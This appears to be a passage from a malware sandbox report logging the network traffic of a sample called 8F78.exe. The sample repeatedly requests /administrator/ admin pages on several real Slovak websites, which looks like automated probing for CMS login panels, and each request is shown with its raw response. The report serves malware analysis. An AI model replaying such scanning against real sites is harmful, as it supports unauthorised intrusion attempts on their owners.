                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                35192.168.2.45276683.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.528552055 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.785639048 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                36192.168.2.45277346.229.230.4805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.529340029 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.785974026 CET376INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.788794041 CET224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://abatek.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.045584917 CET386INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                37192.168.2.45277183.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.530230999 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.785856009 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                38192.168.2.45276983.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.530236006 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.786042929 CET566INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fe<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                39192.168.2.45277446.229.230.4805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.530401945 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.786125898 CET376INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.789915085 CET224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://abatek.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.047224045 CET386INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                40192.168.2.452788141.98.102.194805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.531302929 CET181OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.799937010 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 598
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 5b 73 e2 36 14 7e cf af 38 eb 0c 03 4c 6d f0 05 83 21 86 e9 76 77 3b cd 43 a7 9d 4d f6 a1 ed f4 41 d8 32 a8 91 2d 57 16 21 6c 67 ff 7b 8f 6c 73 73 08 99 30 9d 0a 7c 91 ce d1 a7 a3 73 d3 71 f8 2e 16 91 da e4 14 96 2a e5 b3 ab 50 3f 80 93 6c 31 35 68 66 cc ae 70 84 92 78 76 05 d8 c2 94 2a 02 d1 92 c8 82 aa a9 b1 52 89 15 18 87 a4 8c a4 74 6a 3c 32 ba ce 85 54 06 44 22 53 34 43 d6 35 8b d5 72 1a d3 47 16 51 ab ec 98 c0 32 a6 18 e1 56 11 11 4e a7 8e 09 c5 52 b2 ec c1 52 c2 4a 98 9a 66 e2 04 b4 14 73 a1 8a 03 e0 4c b0 2c a6 4f 26 64 22 11 9c 8b b5 7e 23 32 5a b2 47 ba 9d af 98 e2 74 f6 49 4a 21 61 60 7b 61 bf 1a a8 88 85 da 6c df 75 d3 db 37 77 bd b9 88 37 f0 cf ae 5b 32 50 b6 58 aa 09 38 b6 dd ba 39 a2 94 db 3a 45 48 89 5c b0 6c 02 f6 f1 70 4e e2 98 65 8b a3 f1 6f bb b7 73 32 24 b8 7b 2b 21 29 e3 9b 09 58 24 cf 39 b5 8a 4d a1 68 6a c2 0f 1c 75 f8 33 89 ee ca fe 8f c8 69 82 71 47 17 82 c2 97 5b c3 84 cf 5a 83 c2 84 9f 28 7f a4 8a 45 c4 84 f7 12 cd 80 ea 27 59 61 15 54 b2 04 67 bc d7 a0 f0 41 70 d4 d9 a7 54 fc c5 8c 03 98 13 23 77 9b 74 2e b8 71 bc c3 39 89 1e 16 52 ac b2 d8 8a 34 d2 04 96 05 27 1d db 04 bb 65 96 8a c2 7b f7 c5 39 2c 25 0b 3a 01 49 62 ed 26 0b fd 44 9b 77 88 02 c7 6b c1 78 8c b3 4b 3c d7 0f 8e 11 c1 ce d1 23 94 c4 0d e5 44 e2 1c f0 ed 56 d7 3c 85 34 72 11 69 b8 45 f2 dc 8b 81 82 51 0b 86 de 16 c8 71 2f 47 1a 8c 5b e0 fb 7b a4 e1 c5 48 be d3 02 67 b0 53 93 7d b9 4c 5a e1 3b 91 dc c1 e5 40 1e aa c9 1d ed f5 ed 6d 51 06 ce 5b a1 1c dc 9d b7 33 9d eb fa 26 8c b4 01 5c f7 ad 48 81 df 82 41 f0 9f 08 15 0c 5a 7a 8f 6f 13 aa 91 17 44 81 89 51 60 c2 90 94 13 85 89 ec 6c 7e 58 3a 8d ec 60 ad e9 fc 81 29 eb 30 fa 38 cb 27 a0 e8 93 ba 39 c9 aa 29 98 74 39 df c6 e9 81 84 2f 87 f4 0b a0 17 81 d5 b1 8e c9 8b 12 b9 d7 28 3a 9e 1f d3 85 09 d7 b1 67 db 01 fa dd b5 9d b8 83 a1 d7 d4 59 95 4b f1 ec 40 91 ec 9e 4f d3 b3 3a bb d6 e7 07 c1 b5 64 43 77 75 0e f7 ec 43 00 dd 76 39 1c c8 4a 89 c6 36 c4 93 55 2c 49 2c d6 68 b2 c5 5c 27 24 34 fb fe 66 f7 2a c3 83 53 5f fa 9d 65 78 86 9a 15 bf 8f 19 51 5f 63 4f 33 bb 7e c5 ed 97 53 6c 7d b7 dc d2 6f 4a 66 9d 3d ab 7f cf ab 18 3d 7d 1b 96 7c fa f5 25 1d 4f e0 3a 49 92 d3 0e 30 17 32 a6 d2 d2 6a 5f 15 13 f0 9b 28 56 2a be be ca f4 1a 7d ef d8 64 5e 08 be 52 f4 98 5e 1a cf 6f 9e 9e 9c 26 ea c4 70 e9 54 89 90 69 ed 5f 18 29 b4 63 f9 3a 6a ad e7 31 55 fa 24 e1 6c 81 8b 47 e8 58 54 9e f5 8f ef 53 8a 91 0d 22 e3 1b 28 22 49 69 06 24 8b a1 93 92 27 ab 76 91 81 36 4c b7 e1 3e 2f fa 95 6e f5 c4 c0 6e 1d 91 be 5d 24 08 cb f6 82 38 5a 90 a6 7c e3 e1 ff 21 df 75 8c b5 19 e3 45 03 ae 0e fc eb 71 a2 7f c7 a6 28 8b 97 82 7d a5 3a 50 83 66 9c ed 8a 22 87 a6 e5 e5 56 cf b3 e6 8a 44 4c 4f 95 48 d5 2a 4e cf 7b 2d 1f 2c 9b fa a8 5d b9 4e 27 5a 0e 74 58 16 63 04 d9 fa 77 d2 ef b1 ae 52 22 7d 56 e6 d5 d4 ca 8d 4f d3 64 55 52 36 88 55 ca a9 64 70 9f 6f 20 ec d7 a5 6b d8 af 2a f4 ab 50 97 8a 75 59 1b b3 47 60 f1 d4 d8 19 dc d8 d7 b8 e1 d2 39 ac 86 b1 b7 27 e5 b3 df c4 4a e2 c9 f3 f7 8a 16 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C1W[s6~8Lm!vw;CMA2-W!lg{lss0|sq.*P?l15hfpxv*Rtj<2TD"S4C5rGQ2VNRRJfsL,O&d"~#2ZGtIJ!a`{alu7w7[2PX89:EH\lpNeos2${+!)X$9Mhju3iqG[Z(E'YaTgApT#wt.q9R4'e{9,%:Ib&DwkxK<#DV<4riEQq/G[{HgS}LZ;@mQ[3&\HAZzoDQ`l~X:`)08'9)t9/(:gYK@O:dCwuCv9J6U,I,h\'$4f*S_exQ_cO3~Sl}oJf==}|%O:I02j_(V*}d^R^o&pTi_)c:j1U$lGXTS"("Ii$'v6L>/nn]$8Z|!uEq(}:Pf"VDLOH*N{-,]N'ZtXcwR"}VOdUR6Udpo k*PuYG`9'J
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.799984932 CET228INData Raw: 96 a4 80 b9 f6 ba 39 17 d1 03 8d df 85 fd fc 10 48 42 ff a0 bb 5d b4 76 8a 83 25 4b 72 91 12 ce 8f c7 74 fb 5c af 75 fb 71 02 a1 36 e5 cc 73 82 c0 8b 92 61 30 72 bc f1 30 19 8f 23 1a 8c 68 4c 68 14 c4 73 77 e4 84 fd 92 2d 9c 1f 2d bf 6d f7 2c 45
                                                                                                                                                                                                                                                                                                                                Data Ascii: 9HB]v%Krt\uq6sa0r0#hLhsw--m,E8[#j_:EFQgnO_~~,'iID;mhGp9SvC/4JyKVPv{;9s8VbZW!l0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.801851034 CET240OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://eshopy-katalog.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.055107117 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 598
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
